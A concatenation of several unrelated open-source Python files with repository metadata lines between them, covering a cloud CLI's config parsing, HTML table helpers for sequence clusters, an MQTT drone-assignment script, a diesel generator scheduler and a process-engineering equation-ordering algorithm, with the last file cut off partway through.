rsp = client.DescribeStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
CLIENT_MAP = {
"v20181203": habo_client_v20181203,
}
MODELS_MAP = {
"v20181203": models_v20181203,
}
ACTION_MAP = {
"StartAnalyse": doStartAnalyse,
"DescribeStatus": doDescribeStatus,
}
AVAILABLE_VERSION_LIST = [
"v20181203",
]
def action_caller():
return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["habo"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["habo"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return g_param
| 36.993865 | 105 | 0.696849 |
60f82d75d1c71227b9c9d63fa12af51e571b9f33 | 3,045 | py | Python | seqcluster/libs/table.py | kkarolis/seqcluster | 774e23add8cd4fdc83d626cea3bd1f458e7d060d | [
"MIT"
] | 33 | 2015-01-26T23:18:01.000Z | 2022-01-07T21:40:49.000Z | seqcluster/libs/table.py | kkarolis/seqcluster | 774e23add8cd4fdc83d626cea3bd1f458e7d060d | [
"MIT"
] | 44 | 2015-01-21T17:43:42.000Z | 2021-08-25T15:49:18.000Z | seqcluster/libs/table.py | kkarolis/seqcluster | 774e23add8cd4fdc83d626cea3bd1f458e7d060d | [
"MIT"
] | 18 | 2015-05-18T15:34:32.000Z | 2021-02-10T17:58:24.000Z | from seqcluster.libs.seqviz import seqviz
START1= '''<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>clusters information</title>
<style type="text/css" title="currentStyle">
@import "../css/info_css.css";
</style>
<script type="text/javascript">
function showstuff(boxid){
document.getElementById(boxid).style.visibility="visible";
}
function hidestuff(boxid){
document.getElementById(boxid).style.visibility="hidden";
}
</script>
<script src="../js/Scribl.1.1.4.min.js" ></script>
<script src="../js/jquery.min.js"></script>
<script src="../js/jquery-ui.min.js"></script>
<link href="../js/jquery-ui.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="../js/dragscrollable.js"></script>
<style>
#scribl-zoom-slider {
width: 4px;
}
</style>
'''
START2='''
</head>
<body id="cluster">
'''
JSSTART= '''<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>clusters information</title>
<style type="text/css" title="currentStyle">@import "css/demo_page.css"; @import "css/jquery.dataTables.css";</style><script type="text/javascript" language="javascript" src="js/jquery.js"></script>
<script type="text/javascript" language="javascript" src="js/jquery.dataTables.js"></script><script type="text/javascript" charset="utf-8">$(document).ready(function() { $('#table').dataTable();} );</script>
</head>
<body id="dt_example">
'''
END="</body></html>"
STABLE='<table cellpadding="0" cellspacing="0" border="0" class="info" id="table" width="500px">'
SHR="<tr>"
ETABLE="</tbody></table>"
EHR="</tr>\n"
HEADER_SEQ=["sequence","size"]
HEADER_L=["position","annotation (element:strand)-(distance to 5,distance to 3)"]
def tab2table(file,output):
f = open(file, 'r')
header=f.readline().strip()
for line in f:
line=line.strip()
cols = line.split("\t")
f.close()
return 0
def make_cell(cell):
return "<td>%s</td>" % str(cell)
def make_hs_link(id):
return "<a id=\"myLink\" href=\"javascript:showstuff(%s);\">show</a> <a id=\"myLink\" href=\"javascript:hidestuff(%s);\">hide</a>" % (id,id)
def make_cell_link(cell,link):
return "<td><a href=%s>%s</a></td>" % (link,str(cell))
def make_line(line):
return SHR+line+EHR
def make_table(c,name):
tmp=STABLE
return "%s %s %s " % (tmp,c,ETABLE)
def make_div(c,name,css):
return "<div class=%s name=%s id=%s>%s</div>" % (css,name,name,c)
def make_jshtml(c,name):
tmp=JSSTART
return "%s %s %s " % (tmp,c,END )
def make_html(c,showseq,name):
header=START1+showseq+START2
return "%s %s %s " % (header,c,END)
def make_header(c):
return "<thead><tr>%s</tr></thead><tbody>" % c
def make_cell_header(c):
return "<th>%s</th>\n" % c
def make_a(c,name):
return "<a name=%s>%s</a>\n" % (name,c)
def make_link(c,link):
return "<a href=%s>%s</a>" % (link,c)
| 29 | 210 | 0.658456 |
d8698eb6f4a5c4caa030663f996926a1f91653e9 | 5,255 | py | Python | uav.py | ashishkishor/Internet-of-Things-IOT- | 1cfd9f4890ee39111f1a1610e45c378299e30698 | [
"MIT"
] | null | null | null | uav.py | ashishkishor/Internet-of-Things-IOT- | 1cfd9f4890ee39111f1a1610e45c378299e30698 | [
"MIT"
] | null | null | null | uav.py | ashishkishor/Internet-of-Things-IOT- | 1cfd9f4890ee39111f1a1610e45c378299e30698 | [
"MIT"
] | null | null | null | import paho.mqtt.client as mqttClient
import time
import random
import math
import sys
import json
#importing all the libraries
all_data=[] #to store preferences of individual UAV in list
ls=[] #to know how many vehicle are left to get picked in case of ties
all_clients = [] #all UAV list
uav_location=[]
total_input=0
r=int(sys.argv[2]) #to know how many UAV are there in system
for i in range(1, r):
all_clients.append('uav' + str(i))
ls.append(i)
vehicle_location = []
ans=[]
v={}
def distance(curr, to):#to calculate distance between UAV location and vehicle location
return math.sqrt((to[1] - curr[1]) ** 2 + (to[2] - curr[2]) ** 2)
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("Connected to broker")
global Connected # Use global variable
Connected = True # Signal connection
else:
print("Connection failed Return Code : ", rc)
def on_message(client, userdata, message): #to receive msg from HQ and other UAV's via broker
# Task-5 Write code here
if(message.topic=='location/hq'): #if msg came from HQ based on msg topic
a= str(message.payload.decode("utf-8", "ignore"))
#a=str(message.payload)
#print(a)
#print("ashish")
a=a.split()
#print(a)
#print("as")
for i in range(0,12,2):
vehicle_location.append(dict({1:int(a[i]),2:int(a[i+1])}))
#print(vehicle_location)
else: #if msg came from other UAV
a=str(message.payload.decode("utf-8","ignore"))
#print("ashish")
#print(message.topic)
all_data.append(dict({1:message.topic[len(message.topic)-1],2:int(a)}))
#print(all_data)
#print("ashish")
#d = json.loads(message.payload)
#if (distance(d, curr) < 20):
#contact.append(str(message.topic))
# Task-1 Write code here
client_name = sys.argv[1] #getting the UAV name
client_name="uav"+client_name
print(client_name)
broker_address = "127.0.0.1" # Broker address
port = 1883
with open(str(client_name)+".txt","r") as fp: #reading UAV location from txt file
lines=fp.readlines()
for line in lines:
a=line.split()
uav_location.append(dict({1:int(a[0]),2:int(a[1])}))
# Task-2 Write code here
# create new instance MQTT client
# client
#print(uav_location)
client = mqttClient.Client(client_name)
client.on_connect = on_connect # attach function to callback
client.on_message = on_message # attach function to callback
client.connect(broker_address, port=port) # connect to broker
client.loop_start() # start the loop
client.subscribe("location/hq") #to connect to HQ
for item in all_clients: #to connect to other UAV
if (item != client_name):
client.subscribe("location/" + item)
#print(len(uav_location))
#print(vehicle_location)
#print(len(vehicle_location))
#end_time = time.time() + 15
#while time.time() < end_time:
# Task-4 Write code here
#curr = location_generator()
time.sleep(6) #wait to read all data from text file
end_time=time.time()+len(uav_location)*10
while time.time() < end_time:
print(len(uav_location))
print(len(vehicle_location))
#print(vehicle_location)
#print(uav_location[total_input])
for i in range(0, len(vehicle_location)):
#print(distance(vehicle_location[i], uav_location[0]))
v = dict({1: i + 1, 2: distance(vehicle_location[i], uav_location[total_input%len(uav_location)])})
ans.append(v)
ans=sorted(ans, key=lambda i: i[2])
print(ans)
preferred_list=[] #preference of a UAV in sorted order
for i in ans:
preferred_list.append(i[1])
print(preferred_list)
print("ashish")
#all_data.append(dict({1:client_name[len(client_name)-1],2:preferred_list}))
ans = []
vehicle_location = []
time.sleep(2)
#listToStr = ' '.join([str(elem) for elem in preferred_list])
t0=time.time()
client.publish("location/" + client_name,str(preferred_list[0])) #senidng UAV preference to broker
total_input+=1
time.sleep(5)
value=""
all_data=sorted(all_data,key=lambda i:i[1])
print(all_data)
for i in all_data:
if(int(i[1])<int(client_name[len(client_name)-1])):
preferred_list.remove(i[2])
value+=str(int(client_name[len(client_name)-1])) +"#"+str(preferred_list[0]) #based on ID preference
"""
for i in range(len(all_clients)):
flag=0
#print(i+1)
for j in all_data[i][2]:
#print(j)
if(j in ls):
value.append(dict({1:i+1, 2: j}))
ls.remove(j)
flag=1
if(flag==1):
break
"""
ls=[]
client.publish("preference/" + client_name, str(value)) #sending the assigned vehicle back to HQ
t1 = time.time()
#print(t1-t0)
preferred_list = []
value=""
all_data=[]
for i in range(0,7):
ls.append(i)
time.sleep(3)
# for item in all_clients:
# if(item!=client_name):
client.loop_stop()
print("exiting")
#print(contact)
#time.sleep(200)
| 31.848485 | 108 | 0.618649 |
ed22a40875a7bcb48174eea7fe92f2b936a35ac3 | 8,389 | py | Python | MiGRIDS/Model/Controls/genSchedule0.py | mmuellerstoffels/GBSTools | aebd8aa6667a2284aaa16424f9b9d22ca3a2a375 | [
"MIT"
] | 8 | 2019-02-18T14:18:55.000Z | 2022-03-04T12:34:24.000Z | MiGRIDS/Model/Controls/genSchedule0.py | mmuellerstoffels/GBSTools | aebd8aa6667a2284aaa16424f9b9d22ca3a2a375 | [
"MIT"
] | 3 | 2019-02-13T09:42:08.000Z | 2019-05-10T16:59:02.000Z | MiGRIDS/Model/Controls/genSchedule0.py | acep-uaf/GBSTools | aebd8aa6667a2284aaa16424f9b9d22ca3a2a375 | [
"MIT"
] | 3 | 2019-06-10T19:49:22.000Z | 2021-05-08T08:42:57.000Z |
# Project: GBS Tool
# Author: Jeremy VanderMeer, jbvandermeer@alaska.edu, Alaska Center for Energy and Power
# Date: October 1, 2018
# License: MIT License (see LICENSE file of this package for more information)
# imports
import numpy as np
class genSchedule:
def __init__(self,args):
# whether to try to minimize fuel consumption or maximize RE contribution (by minimizing MOL of generators)
self.minimizeFuel = args['minimizeFuel']
def runSchedule(self, ph, futureLoad, futureRE, scheduledSRCSwitch, scheduledSRCStay, powerAvailToSwitch, powerAvailToStay, underSRC):
# scheduled load is the difference between load and RE, the min of what needs to be provided by gen or ess
scheduledLoad = max(futureLoad - futureRE,0)
## first find all generator combinations that can supply the load within their operating bounds
# find all with capacity over the load and the required SRC
capReq = max(int(scheduledLoad - powerAvailToSwitch + scheduledSRCSwitch),0)
indCap = np.asarray(ph.lkpGenCombinationsUpperNormalLoading.get(capReq, ph.genCombinationsUpperNormalLoadingMaxIdx), dtype=int)
# check if the current online combination is capable of supplying the projected load minus the power available to
# help the current generator combination stay online
if ph.onlineCombinationID not in indCap and not (True in ph.outOfNormalBounds) and not underSRC: # keep current generating combingation in the mix unless has gone out of bounds for allotted amount
#ph.genCombinationsUpperNormalLoading[ph.onlineCombinationID] >= scheduledLoad + scheduledSRCStay - powerAvailToStay:
# do not add the current generating option if it is diesel-off and it does not have enough SRC
#if not((ph.onlineCombinationID == 0) and underSRC):
indCap = np.append(indCap,ph.onlineCombinationID)
# if there are no gen combinations large enough to supply, automatically add largest (last combination)
if indCap.size == 0:
indCap = np.append(indCap,len(ph.genCombinationsUpperNormalLoading)-1)
indInBounds = indCap
elif indCap.size == 1:
indInBounds = indCap
else:
# find all with MOL under the load
indMOLCap = [idx for idx, x in enumerate(ph.genCombinationsMOL[indCap]) if x <= futureLoad]
# ind of in bounds combinations
indInBounds = indCap[indMOLCap]
# if there are no gen combinations with a low enough MOL enough to supply, automatically add combination 1,
# which is to smallest generator combination without turning off the generators
if indInBounds.size == 0:
indInBounds = np.array([indCap[0]])
indInBounds = np.atleast_1d(indInBounds)
## then check how long it will take to switch to any of the combinations online
lenGenerators = len(ph.generators)
turnOnTime = [None]*lenGenerators
turnOffTime = [None]*lenGenerators
for idx, gen in enumerate(ph.generators):
# get the time remaining to turn on each generator
# include this time step in the calculation. this avoids having to wait 1 time step longer than necessary to bring a diesel generator online.
turnOnTime[idx] = gen.genStartTime - gen.genStartTimeAct - ph.timeStep
# get the time remaining to turn off each generator
turnOffTime[idx] = gen.genRunTimeMin - gen.genRunTimeAct - ph.timeStep
# Go through each potential combination of generators and find which generators need to be switched on and
# offline for each combination
lenIndInBounds = indInBounds.size #len(indInBounds)
genSwOn = [] # the generators to be switched on for each possible combination
genSwOff = [] # the generators to be switched off for each possible combination
timeToSwitch = [None]*lenIndInBounds # the time switch for each in bounds generator combination
fuelCons = [None]*lenIndInBounds # the predicted fuel consumption for each combination
for ind, idx in enumerate(np.atleast_1d(indInBounds)): # for each combination that is in bounds
# inititiate the generators to be switched on for this combination to all generators in the combination
genSwOn.append(list(ph.genCombinationsID[idx]))
# initiate the generators to be switched off for this combination to all generators currently online
genSwOff.append(list(ph.genCombinationsID[ph.combinationsID.index(ph.onlineCombinationID)]))
# find common elements between switch on and switch off lists
commonGen = list(set(genSwOff[-1]).intersection(genSwOn[-1]))
# remove common generators from both lists
for genID in commonGen:
genSwOn[-1].remove(genID)
genSwOff[-1].remove(genID)
# for each gen to be switched get time, max time for combination is time will take to bring online
# find max time to switch generators online
onTime = 0
for genID in genSwOn[-1]: # for each to be brought online in the current combination
onTime = max(onTime,turnOnTime[ph.genIDS.index(genID)]) # max turn on time
# find max of turn on time and turn off time
SwitchTime = onTime # initiate to max turn on time
for genID in genSwOff[-1]: # for each generator to be switched off in the current combination
SwitchTime = max(SwitchTime, turnOffTime[ph.genIDS.index(genID)]) # check if there is a higher turn off time
timeToSwitch[ind] = SwitchTime
if self.minimizeFuel:
# get the generator fuel consumption at this loading for this combination
FCpower, FCcons = zip(*ph.genCombinationsFCurve[idx]) # separate out the consumptio n and power
# check if this is the online combination. If so, use the power available to stay online to calculate the
# the load required by the generator
if idx == ph.onlineCombinationID:
useScheduledLoad = int(max([scheduledLoad - powerAvailToStay, ph.genCombinationsMOL[idx]]))
else:
useScheduledLoad = int(max([scheduledLoad - powerAvailToSwitch, ph.genCombinationsMOL[idx]]))
indFCcons = getIntListIndex(useScheduledLoad, FCpower)
fuelCons[ind] = FCcons[indFCcons]
# TODO: Add cost of switching generators
## bring the best option that can be switched immediatley, if any
# if the most efficient option can't be switched, start warming up generators
# order fuel consumptions
if self.minimizeFuel:
indSort = np.argsort(fuelCons)
else:
indSort = np.argsort(ph.genCombinationsMOL[indInBounds])
# if the most efficient can be switched on now, switch to it
if timeToSwitch[indSort[0]] <= 0:
# update online generator combination
ph.onlineCombinationID = ph.combinationsID[indInBounds[indSort[0]]]
ph.switchGenComb(genSwOn[indSort[0]], genSwOff[indSort[0]]) # switch generators
for idx in range(len(ph.genIDS)):
# update genPAvail
ph.generators[idx].updateGenPAvail()
# otherwise, start or continue warming up generators for most efficient combination
else:
ph.startGenComb(genSwOn[indSort[0]])
# otherwise, if a generator is out of bounds (not just normal bounds) switch to the best possible, if can
if (True in (np.array(timeToSwitch)<=0)) & (True in ph.outOfBounds):
# find most efficient option that can be switched now
indBest = next((x for x in range(len(indSort)) if timeToSwitch[indSort[x]] <= 0 )) # indBest wrt indSort
# update online generator combination
ph.onlineCombinationID = ph.combinationsID[indInBounds[indSort[indBest]]]
ph.switchGenComb(genSwOn[indSort[indBest]],genSwOff[indSort[indBest]]) # switch generators
for idx in range(len(ph.genIDS)):
# update genPAvail
ph.generators[idx].updateGenPAvail() | 61.683824 | 204 | 0.669448 |
cbb79b1d910487205f22699a6b71e2116eae054e | 55,158 | py | Python | main.py | AntonioRochaAZ/ProcessEngineering | ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1 | [
"MIT"
] | null | null | null | main.py | AntonioRochaAZ/ProcessEngineering | ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1 | [
"MIT"
] | null | null | null | main.py | AntonioRochaAZ/ProcessEngineering | ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1 | [
"MIT"
] | 1 | 2022-01-08T01:13:49.000Z | 2022-01-08T01:13:49.000Z | ### ALGORITMO DE ORDENAÇÃO DE EQUAÇÕES
from warnings import warn
import inspect
import numpy as np
import matplotlib.pyplot as plt
from typing import Tuple, Callable, Union, Dict, Generator
import networkx as nx
# TODO: Make it so that we cannot have two equipments or streams with the same name
# Also, add a few details to the aoe2 picking algorithm when mulitple choices are possible
# TODO: The dynamically defined functions are interesting, but I think it would
# be perhaps more useful if they were defined separately from the objects.
# We'll see in the future how this will develop.
# TODO: URGENT:
# Must stop checking and updating flow composition of outflows, since there
# may be chemical reactions that generate products. Keep the addition of the
# reactants though (never remove substances, only add them).
def aoe2(*fns: Callable, **xs: Union[float, int]):
"""Equation Ordering Algorithm.
The name aoe stands for "Algorítmo de Ordenação de Equações", which means
"Equation Ordering Algorithm". The '2' in the name stands for version 2.
Args:
*fns: Functions that represent the equations that must equal 0.
**xs: Specified/Known variable values.
Returns:
A tuple with the:
- The order in which the equations should be solved (expressed through a
list called ``func_seq``).
- The order in which the variables should be solved for (expressed
through a list called ``var_seq``).
- A list with the project variables (those that must be specified
or optimized).
"""
fns = list(fns)
for entry in fns:
if isinstance(entry, Process):
for equation in entry.equations():
fns.append(equation)
fns.remove(entry)
xs["flow"] = None
xs["equipment"] = None
xs["substance"] = None
# Function <-> Arguments dictionaries (NOT INVERSES)
func_dict = {} # function -> its arguments
var_dict = {} # arguments -> functions it relates to
for f in fns:
var_list = inspect.getfullargspec(f)[0]
func_dict[f] = var_list
for var in var_list:
if var not in var_dict:
var_dict[var] = [f]
else:
var_dict[var].append(f)
if 'plot' in var_dict:
raise NameError("Can't have 'plot' as variable name.")
elif 'graph' in var_dict:
raise NameError("Can't have 'graph' as a variable name.")
# Detecting whether or not the system of equations can be solved
if len(var_dict) < len(fns):
raise ValueError("Impossible system: more Equations than Variables.")
# Calculating the Incidence Matrix
inmx = np.zeros((len(fns), len(var_dict)))
for idx_f, f in enumerate(func_dict):
for idx_x, x in enumerate(var_dict):
if x in func_dict[f] and x not in xs:
inmx[idx_f, idx_x] = 1
#### Definitions
# Sequences:
func_seq = [None] * min(len(fns), len(var_dict))
var_seq = [None] * min(len(fns), len(var_dict))
# Insert indexes:
insert_idx_1 = 0
insert_idx_2 = -1
# List of indexes for opening variables:
go_back_list = []
# Dictionaries between number -> function/variable
num_func = {i: list(func_dict.keys())[i] for i in range(len(func_dict))}
num_var = {i: list(var_dict.keys())[i] for i in range(len(var_dict))}
# Dictionaries between function/variable -> number
func_num = {y: x for x, y in num_func.items()}
var_num = {y: x for x, y in num_var.items()}
def plot_incidence_matrix(inmx, ax=None):
if ax is None:
fig, ax = plt.subplots(1, 1)
img = ax.imshow(inmx)
ax.set_xticks([i for i in range(len(var_dict))])
ax.set_xticklabels([key for key in var_dict])
ax.set_yticks([i for i in range(len(fns))])
ax.set_yticklabels([key.__name__ for key in func_dict])
ax.set_ylabel("Functions")
ax.set_xlabel("Variables")
plt.show(block=True)
if ('graph' in xs) and (xs['graph']):
# TODO: solve the graph "problem"
# (Make a botch so that lines can 'bifurcate')
# Solution (implemented): make nodes for variables too.
function_graph = nx.Graph()
function_graph.add_nodes_from(list((f.__name__, {"subset": 1}) for f in fns))
edge_graph = nx.Graph()
edge_graph.add_nodes_from(list((f.__name__, {"subset": 1}) for f in fns))
edge_list = []
label_dict = {}
for variable in var_dict:
functions = var_dict[variable]
# if len(functions) > 2 or len(functions) == 1:
edge_graph.add_nodes_from([(variable, {'subset': 2})])
for idx1 in range(len(functions)):
if len(functions) == 1:
t = (variable, functions[idx1].__name__)
edge_list.append(t)
label_dict[t] = variable
for idx2 in range(idx1+1, len(functions)):
# if len(functions) > 2:
t1 = (functions[idx1].__name__, variable)
t2 = (variable, functions[idx2].__name__)
edge_list.append(t1)
edge_list.append(t2)
label_dict[t1] = variable
label_dict[t2] = variable
# elif len(functions) == 2:
# t = (functions[idx1].__name__, functions[idx2].__name__)
# edge_list.append(t)
# label_dict[t] = variable
edge_graph.add_edges_from(edge_list)
# graph.add_edges_from(edge_list)
function_graph_options = {
'with_labels': True,
'node_color': 'lightgray',
'node_size': 500
}
edge_graph_options = {
'with_labels': True,
'node_color': 'lightblue',
'node_size': 500
}
hidden_pos = nx.multipartite_layout(edge_graph)
pos = {}
for key in hidden_pos:
if key in function_graph.nodes():
pos[key] = hidden_pos[key]
def plot_graph(ax = None, show: bool = False):
nx.draw(edge_graph, hidden_pos, **edge_graph_options, ax=ax)
nx.draw(function_graph, pos, **function_graph_options, ax=ax)
nx.draw_networkx_edge_labels(edge_graph, hidden_pos,
edge_labels=label_dict, ax=ax)
nx.draw_networkx_edges(edge_graph, hidden_pos, ax=ax)
if show:
plt.show(block=True)
def update_graph():
# Deleting variable nodes that are no longer present:
for idx_x in range(len(var_dict)): # number of columns
var = num_var[idx_x]
if (sum(inmx[:, idx_x]) == 0):
if var in edge_graph.nodes():
edge_graph.remove_node(var)
if var in label_dict.values():
iterable = list(label_dict.keys())
for key in iterable:
if label_dict[key] == var:
del label_dict[key]
# elif sum(inmx[:, idx_x]) == 1:
# if var not in edge_graph.nodes():
# # check in the incidence matrix in the variable is still there for some reason.
# # it it only shows up once, and it didn't before, a node has to be created.
# edge_graph.add_node(var)
# idx_f = np.argmax(inmx[:, idx_x])
# edge_graph.add_edge(var, num_func[idx_f].__name__)
for idx_f in range(len(fns)):
f = num_func[idx_f].__name__
if sum(inmx[idx_f, :]) == 0 and f in edge_graph.nodes():
function_graph.remove_node(f)
edge_graph.remove_node(f)
# Updating label_dict:
iterable = list(label_dict.keys())
for key in iterable:
if f in key:
var = label_dict[key]
del label_dict[key]
if ('plot' in xs) and (xs['plot']):
# Base inmx0 for plotting:
inmx0 = np.zeros((len(fns), len(var_dict)))
for idx_f, f in enumerate(func_dict):
for idx_x, x in enumerate(var_dict):
if x in func_dict[f]:
inmx0[idx_f, idx_x] = 1
fig, axs = plt.subplots(1, 2)
fig.set_size_inches(14, 8)
ax = axs[0]
plot_graph(axs[1])
plot_incidence_matrix(inmx0, ax)
else:
plot_graph()
elif ('plot' in xs) and (xs['plot']):
# Base inmx0 for plotting:
inmx0 = np.zeros((len(fns), len(var_dict)))
for idx_f, f in enumerate(func_dict):
for idx_x, x in enumerate(var_dict):
if x in func_dict[f]:
inmx0[idx_f, idx_x] = 1
plot_incidence_matrix(inmx0)
# The actual loop.
while True:
if ('plot' in xs) and (xs['plot']):
if ('graph' in xs) and (xs['graph']):
fig, axs = plt.subplots(1, 2)
fig.set_size_inches(14, 8)
update_graph()
plot_graph(axs[1])
ax = axs[0]
else:
fig, ax = plt.subplots(1, 1)
plot_incidence_matrix(inmx, ax)
elif ('graph' in xs) and (xs['graph']):
update_graph()
plot_graph(show=True)
# Test for equations with only one variable:
for idx_f, row in enumerate(inmx):
if sum(row) == 1:
idx_x = np.argmax(row)
func_seq[insert_idx_1] = idx_f
var_seq[insert_idx_1] = idx_x
insert_idx_1 += 1
inmx[:, idx_x] = 0
inmx[idx_f, :] = 0
print(f"\nSingle variable equation: {num_func[idx_f].__name__};"
f"\nAssociated Variable: {num_var[idx_x]}.")
break
else:
# If the loop didn't break, then no variables were updated
# Loop through columns to check for variables of unit frequency:
instances = np.zeros(len(var_dict))
for idx_x in range(inmx.shape[1]):
col = inmx[:, idx_x]
instances[idx_x] = sum(col)
if sum(col) == 1:
idx_f = np.argmax(col)
func_seq[insert_idx_2] = idx_f
var_seq[insert_idx_2] = idx_x
insert_idx_2 -= 1
inmx[idx_f, :] = 0
print(f"\nVariable of unit frequency: {num_var[idx_x]};\n"
f"Associated Equation: {num_func[idx_f].__name__}.")
break
else:
# Loops
instances[instances == 0] = 100
idx_x = np.argmin(instances)
x = num_var[idx_x]
for f in var_dict[x]:
idx_f = func_num[f]
if idx_f not in func_seq:
func_seq[insert_idx_2] = idx_f
go_back_list.append(insert_idx_2)
insert_idx_2 -= 1
inmx[idx_f, :] = 0
print(f"\nLOOP:\n"
f"\tEquation: {num_func[idx_f].__name__};")
break
else:
raise RuntimeError("Unexpected Error.")
# If the incidence matrix is empty
if not inmx.any():
break
# Variáveis de Abertura:
open_vars = []
if go_back_list:
for idx in go_back_list:
idx_list = list(range(len(var_seq)+idx))
# idx_list.reverse()
max_idx = -1
for x in func_dict[num_func[func_seq[idx]]]:
# If the variable hasn't been attributed:
if var_num[x] not in var_seq:
# Going backwards in the sequence:
for loop_idx in idx_list:
if x in func_dict[num_func[func_seq[loop_idx]]]:
if loop_idx > max_idx:
var_seq[idx] = var_num[x]
max_idx = loop_idx
print(f"\nSmallest loop so far: "
f"{x} with {len(var_seq)+idx - loop_idx} "
f"equations of distance.")
# Skip to the next variable
break
open_x = num_var[var_seq[idx]]
print(f"\nOpening variable: {open_x}")
open_vars.append(open_x)
# for x in func_dict[num_func[func_seq[idx]]]: # ai ai
#
#
# if var_num[x] not in var_seq:
# var_seq[idx] = var_num[x]
# break
var_seq = [num_var[i] for i in var_seq]
func_seq = [num_func[i] for i in func_seq]
proj_vars = [x for x in var_dict if x not in var_seq]
print(
f"\nEquation sequence:\n",
*(f"\t- {func.__name__};\n" for func in func_seq),
f"\nVariable sequence:\n",
*(f"\t- {x};\n" for x in var_seq),
)
if open_vars:
print(
f"Opening variables:\n",
*(f"\t- {x};\n" for x in open_vars)
)
if proj_vars:
print(
f"Project Variables:\n",
*(f"\t- {x};\n" for x in proj_vars)
)
return func_seq, var_seq, proj_vars
class Substance:
"""Class for a chemical substance.
Class Attributes:
_name: The molecule's _name
mm: Molar mass (kg/kmol).
composition: The number of atoms of each element that the molecule has.
atomic_mass: Look-up table for atomic masses.
"""
name = None
mm = None
T_boil = None
latent_heat = None
composition = {
"H": 0,
"He": 0,
# ...
}
@staticmethod
def remove_substances(cls_inst: Union['Flow', 'Equipment'], *substances: 'Substance'):
"""Method for removing substances from a current or equipment.
"""
for substance in substances:
try:
cls_inst.composition.remove(substance)
except ValueError: # ValueError: list.remove(x): x not in list
continue
cls_inst._x.pop(f'x_{cls_inst.name}_{substance.name}')
@classmethod
def cp(substance, T, T_ref: None) -> float:
"""Function for calculating the substance's cp value at a given
temperature T or its mean cp value at a temperature range [T, T_ref]
(or [T, T_ref])
.. warning::
ENERGY BALANCES IMPLICITLY ASSUME THAT CP OF COMPLEX SOLUTIONS IS
THE WEIGHTED MEAN OF THE INDIVIDUAL SUBSTANCES' CPs.
Args:
T: The stream's temperature [K].
T_ref: The temperature we are using as a reference [K].
Returns:
The mean Cp value at the temperature interval.
If there's a phase change, then it will automatically add the
latent heat term in such a way that, when the result is multiplied
by (T-T_ref), we get the correct result for energy/mass flow rate
"""
if T_ref is not None:
if T < substance.T_boil and substance.T_boil < T_ref:
# it's divided by the (T-Tref) so we can get the correct
# values when we mutiply it by that factor
# Mean at liquid * (Tboil - T_ref)/(T-T_ref)
# + (latent_heat/(T - T_ref))
# + Mean at vapour * (T_ref - Tboil)/(T-T_ref)
pass
elif T > substance.T_boil and substance.T_boil > T_ref:
# Wait, is it the same expression? I think so.
pass
else:
# Do the mean at the interval
pass
else:
# Do the mean at the interval
pass
class Flow:
"""A process current.
TODO: There still need to be constant updates of the w, wmol, x, xmol
quantities.
Class Attributes:
tolerance: Tolerance for mass/molar fraction sum errors.
Attributes:
composition: A list with the substances present in the flow.
w: Flow rate (mass per unit time).
x: A ``dict`` for storing the value of the mass fractions.
Each entry corresponds to a component. Sum must
equal one. Unknown values are marked as ``None``.
wmol: Flow rate (mol per unit time).
xmol: Molar fractions.
T: Temperature (in K).
"""
tolerance = 0.05
def __init__(self, name: str, *substances: Substance, **info: float):
if substances == ():
warn("No substances informed.")
self.composition = list(substances)
self.equations = {} # Actual equations
self._equations = {} # Equations checked by aoe.
# Name and restriction addition:
if not isinstance(name, str):
raise TypeError("Please inform a valid name (string type).")
self._update_restriction(name) # self._name is defined here.
# Composition and flow rate information
self.w = None
self.x = {}
self._x = {}
for substance in substances:
